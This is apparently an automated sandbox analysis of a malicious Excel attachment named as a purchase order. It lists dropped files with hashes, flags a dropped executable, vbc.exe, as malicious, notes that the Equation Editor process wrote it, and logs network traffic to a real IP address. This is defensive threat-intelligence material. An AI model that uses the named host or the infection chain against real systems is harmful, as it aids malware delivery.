SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A60727D8.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2B446A4.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B546FBF4.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.524734683987759
Encrypted:	false
SSDEEP:	96:w/gyEVhCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wYyEVdTrZuloOSGZboS/C93n+KuI
MD5:	D0D0B33D13AD63FE1E09F956A6A07781
SHA1:	72E1733CB4896917575F9F29BA48BBF9B354E1AB
SHA-256:	CAAAEA90D88A8B96864076DD213B5C538C6DC9A7E71871ED20F0440CA8097C31
SHA-512:	2F6C06ADCB811528194540BC0E9675E0DA27C5946410A94A3572169F53FF6A3DD606E51DDC3D23EC17627741CA0539C31212208490C669E46915F989D56831B5
Malicious:	false
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.......................P.....p....\.....................p........<5.u..p....`.p.z..$y.w.B.................w....$.......d.......4....^.p.....^.p.=...B..........-........<.w................<.9u.Z.v....X.n.....z.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCB557BA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD94195D.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E42F23CC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED5BDC81.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\Desktop\~$new order no. Hc511 for sept.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.856294769172108
Encrypted:	false
SSDEEP:	1536:pPZofiqowwrfmHQbo8WutIgP1a06aO6QqnOLLOgsm0s/g9CuLwJN8SCImz:w4wWps4agd+qYnvIbLwP8dImz
MD5:	652E9A32D7FDC6783BC63C097D8ACF74
SHA1:	E3879E6A4F9A60CAE459690C28B4EB0B3B452957
SHA-256:	9A61D81097E2AD10AA0065980D204EAFEFBF7CD089E774B878C69607E211A0DB
SHA-512:	7360F84059440734FC4B4E7AEBCE472C55A8EED75CB38D09759DC9A6850413D7470706431303BBD9ADAC410FA0ED955BC798D2E0310E46AFA3E278FBFF0F8587
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L......J.....................P......t.............@............................................................................(........)..................................................................(... .......0............................text............................... ..`.data...............................@....rsrc....).......0..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.988155275730794
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	new order no. Hc511 for sept.xlsx
File size:	602008
MD5:	10522a9c4f1f52b4fe31456e03133b43
SHA1:	f78da793ab620c213e55e33ecdfe689f780eb910
SHA256:	342d93a58f17297d9de1ab5dbe0f23298f1cb7e2622d5816208ce5ef11579984
SHA512:	aacecfd6b206fcb6e3c58f1cd3b79846f59e04cca31634ecd9ca55242c063a837e134eaaa1dee048e798cff94384d3e011ee3248d66b1362a238a0f072a7e6af
SSDEEP:	12288:B5i5jAvhpr6sZRjblH9QWxCG+xxeL3GBWijzFTfNw5HoqQ:Bwx6ZlpbJ9QPpxxcGBnjzdNw5H4
File Content Preview:	........................>.......................................................................................{..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 20:58:57.080641031 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.191822052 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.191891909 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.192261934 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.306423903 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.306458950 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.306482077 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.306505919 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.306579113 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.308255911 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.419075966 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419106007 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419146061 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419181108 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419282913 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.419317961 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.419398069 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419428110 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419441938 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419460058 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.419522047 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.419653893 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.532584906 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532635927 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532672882 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532712936 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532748938 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532783031 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532803059 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.532819033 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532847881 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.532855988 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532890081 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.532891989 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532927990 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532929897 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.532963991 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.532967091 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533004999 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.533008099 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533041954 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.533046007 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533077002 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.533082008 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533113956 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.533122063 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533152103 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.533173084 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.533207893 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.537664890 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645291090 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645329952 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645355940 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645379066 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645402908 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645427942 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645453930 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645478010 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645499945 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645524979 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645548105 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645566940 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645576954 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645591974 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645617962 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645653009 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645658016 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645678043 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645701885 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645709038 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645721912 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645730019 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645752907 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645755053 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645780087 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645781994 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645807981 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645808935 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645834923 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645839930 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645860910 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645881891 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645884037 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645905972 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645915985 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645929098 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645950079 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645963907 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.645972967 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.645993948 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.646002054 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.646018982 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.646044016 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.646045923 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.646066904 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.646080971 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.646116972 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.650314093 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757517099 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757584095 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757625103 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757649899 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757671118 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757692099 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757730007 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757747889 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757752895 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757771969 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757776022 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757786989 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757793903 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757811069 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757833004 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757854939 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757858038 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757875919 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757877111 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757898092 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757900953 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757915974 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757925034 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757936001 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757950068 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757955074 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.757978916 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.757991076 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758004904 CEST	80	49167	172.245.26.190	192.168.2.22
